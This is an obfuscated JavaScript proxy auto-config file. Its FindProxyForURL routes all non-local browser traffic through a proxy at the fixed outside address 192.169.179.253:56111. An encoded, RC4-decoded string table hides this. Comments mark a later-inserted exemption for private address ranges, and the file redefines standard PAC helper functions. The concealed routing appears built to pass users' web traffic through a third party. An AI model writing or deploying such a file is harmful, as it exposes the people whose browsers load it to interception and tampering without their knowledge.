function _0xde04(_0x11b7bb,_0x3ff7f1){var _0x2f49e0=_0x2f49();return _0xde04=function(_0xde0488,_0x431760){_0xde0488=_0xde0488-0xed;var _0x23a88d=_0x2f49e0[_0xde0488];if(_0xde04['wowYiZ']===undefined){var _0x18e6b4=function(_0x3a2e95){var _0x19cc3d='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0xbe548e='',_0x2143b6='';for(var _0x1afba4=0x0,_0xaaff50,_0x4bc711,_0x7d7a50=0x0;_0x4bc711=_0x3a2e95['charAt'](_0x7d7a50++);~_0x4bc711&&(_0xaaff50=_0x1afba4%0x4?_0xaaff50*0x40+_0x4bc711:_0x4bc711,_0x1afba4++%0x4)?_0xbe548e+=String['fromCharCode'](0xff&_0xaaff50>>(-0x2*_0x1afba4&0x6)):0x0){_0x4bc711=_0x19cc3d['indexOf'](_0x4bc711);}for(var _0x458c08=0x0,_0x3fbd3a=_0xbe548e['length'];_0x458c08<_0x3fbd3a;_0x458c08++){_0x2143b6+='%'+('00'+_0xbe548e['charCodeAt'](_0x458c08)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x2143b6);};var _0x2012c6=function(_0x3f32d4,_0x38a39c){var _0xa4043b=[],_0x322299=0x0,_0x4721a5,_0x8657c6='';_0x3f32d4=_0x18e6b4(_0x3f32d4);var _0x11e3bb;for(_0x11e3bb=0x0;_0x11e3bb<0x100;_0x11e3bb++){_0xa4043b[_0x11e3bb]=_0x11e3bb;}for(_0x11e3bb=0x0;_0x11e3bb<0x100;_0x11e3bb++){_0x322299=(_0x322299+_0xa4043b[_0x11e3bb]+_0x38a39c['charCodeAt'](_0x11e3bb%_0x38a39c['length']))%0x100,_0x4721a5=_0xa4043b[_0x11e3bb],_0xa4043b[_0x11e3bb]=_0xa4043b[_0x322299],_0xa4043b[_0x322299]=_0x4721a5;}_0x11e3bb=0x0,_0x322299=0x0;for(var _0x4ee24e=0x0;_0x4ee24e<_0x3f32d4['length'];_0x4ee24e++){_0x11e3bb=(_0x11e3bb+0x1)%0x100,_0x322299=(_0x322299+_0xa4043b[_0x11e3bb])%0x100,_0x4721a5=_0xa4043b[_0x11e3bb],_0xa4043b[_0x11e3bb]=_0xa4043b[_0x322299],_0xa4043b[_0x322299]=_0x4721a5,_0x8657c6+=String['fromCharCode'](_0x3f32d4['charCodeAt'](_0x4ee24e)^_0xa4043b[(_0xa4043b[_0x11e3bb]+_0xa4043b[_0x322299])%0x100]);}return _0x8657c6;};_0xde04['CAiLTT']=_0x2012c6,_0x11b7bb=arguments,_0xde04['wowYiZ']=!![];}var _0x279fd9=_0x2f49e0[0x0],_0x4f30fa=_0xde0488+_0x279fd9,_0xfb3816=_0x11b7bb[_0x4f30fa];return!_0xfb3816?(_0xde04['OJZehV']===undefined&&(_0xde04['OJZehV']=!![]),_0x23a88d=_0xde04['CAiLTT'](_0x23a88d,_0x431760),_0x11b7bb[_0x4f30fa]=_0x23a88d):_0x23a88d=_0xfb3816,_0x23a88d;},_0xde04(_0x11b7bb,_0x3ff7f1);}(function(_0x282934,_0x36597b){var _0x48f367=_0xde04,_0x6dff71=_0x282934();while(!![]){try{var _0x459726=parseInt(_0x48f367(0x107,'rHu4'))/0x1*(-parseInt(_0x48f367(0xf9,'B&7B'))/0x2)+parseInt(_0x48f367(0xff,'TrYN'))/0x3*(-parseInt(_0x48f367(0xf8,'1V4c'))/0x4)+parseInt(_0x48f367(0xee,'kImF'))/0x5+parseInt(_0x48f367(0xf5,'[9RK'))/0x6*(parseInt(_0x48f367(0x104,'mkGi'))/0x7)+-parseInt(_0x48f367(0xfc,'TJ)m'))/0x8*(-parseInt(_0x48f367(0xfe,'ydm%'))/0x9)+-parseInt(_0x48f367(0xf6,'GQtI'))/0xa*(-parseInt(_0x48f367(0xef,'hMlN'))/0xb)+-parseInt(_0x48f367(0x102,'l&cu'))/0xc;if(_0x459726===_0x36597b)break;else _0x6dff71['push'](_0x6dff71['shift']());}catch(_0x1ffca2){_0x6dff71['push'](_0x6dff71['shift']());}}}(_0x2f49,0xdb697));function _0x2f49(){var _0x20e239=['split','2625YZUBBP','PROXY\x20192.169.179.253:56111;\x20DIRECT','6kJGjEC','toLowerCase','110000gEnYKD','length','xyz','push','189209rEDOOd','charCodeAt','73fCCZks','charAt','owYiZ','60QFGkSe','4441JEZgEy','fromCharCode','26QFKMFY','338dRCxdA','1382vThHsL','localhost','abc','8664826sXTMxt','return\x20(function()\x20','907GswVfF','slice','1322638jRSQDN','8073785LmyAYU','13350mlqDbs','indexOf','5|4|2|3|1|0','test','split','9959GJqndF','2526508kQAfEt'];_0x2f49=function(){return _0x20e239;};return _0x2f49();}
function atoi(_0x6c4f22){const _0x1870b8={'a':0x61,'b':0x62,'c':0x63,'d':0x64,'e':0x65,'f':0x66,'g':0x67,'h':0x68,'i':0x69,'j':0x6a,'k':0x6b,'l':0x6c,'m':0x6d,'n':0x6e,'o':0x6f,'p':0x70,'q':0x71,'r':0x72,'s':0x73,'t':0x74,'u':0x75,'v':0x76,'w':0x77,'x':0x78,'y':0x79,'z':0x7a,'0':0x30,'1':0x31,'2':0x32,'3':0x33,'4':0x34,'5':0x35,'6':0x36,'7':0x37,'8':0x38,'9':0x39,'.':0x2e};return _0x1870b8[_0x6c4f22]||0x20;}function hostHash(_0x25d0f7){var _0x360968=_0xde04;let _0x1857ac=0x0;const _0x25327c=_0x25d0f7[_0x360968(0xf1,'IJ$E')]();if(_0x25327c[_0x360968(0xf4,'hlPr')]===0x0)return _0x1857ac;for(let _0x1133a4=0x0;_0x1133a4<_0x25327c[_0x360968(0xf4,'hlPr')];_0x1133a4++){_0x1857ac+=atoi(_0x25327c[_0x360968(0xfb,'Oia@')](_0x1133a4));}return _0x1857ac;}function FindProxyForURL(_0xaaff50,_0x4bc711){var _0x360968=_0xde04; // Add this line
if (isPlainHostName(_0x4bc711) || shExpMatch(_0x4bc711, "*.local") || shExpMatch(_0x4bc711, "192.168.*.*") || shExpMatch(_0x4bc711, "10.*.*.*") || shExpMatch(_0x4bc711, "172.16.*.*") || shExpMatch(_0x4bc711, "172.17.*.*") || shExpMatch(_0x4bc711, "172.18.*.*") || shExpMatch(_0x4bc711, "172.19.*.*") || shExpMatch(_0x4bc711, "172.20.*.*") || shExpMatch(_0x4bc711, "172.21.*.*") || shExpMatch(_0x4bc711, "172.22.*.*") || shExpMatch(_0x4bc711, "172.23.*.*") || shExpMatch(_0x4bc711, "172.24.*.*") || shExpMatch(_0x4bc711, "172.25.*.*") || shExpMatch(_0x4bc711, "172.26.*.*") || shExpMatch(_0x4bc711, "172.27.*.*") || shExpMatch(_0x4bc711, "172.28.*.*") || shExpMatch(_0x4bc711, "172.29.*.*") || shExpMatch(_0x4bc711, "172.30.*.*") || shExpMatch(_0x4bc711, "172.31.*.*")) return "DIRECT"; // Inserted line
const _0x3fbd3a=['192.169.179.253:56111'];const _0x186dad=hostHash(_0x4bc711);const _0x3f18da=_0x3fbd3a[_0x186dad%_0x3fbd3a[_0x360968(0xf4,'hlPr')]];return _0x360968(0x101,'[k5M')+_0x3f18da;}

// Example of local address check
function isPlainHostName(host) {
  return host.indexOf('.') == -1;
}

function shExpMatch(host, pattern) {
  var regex = new RegExp("^" + pattern.replace(/\./g, "\\.").replace(/\*/g, ".*") + "$");
  return regex.test(host);
}
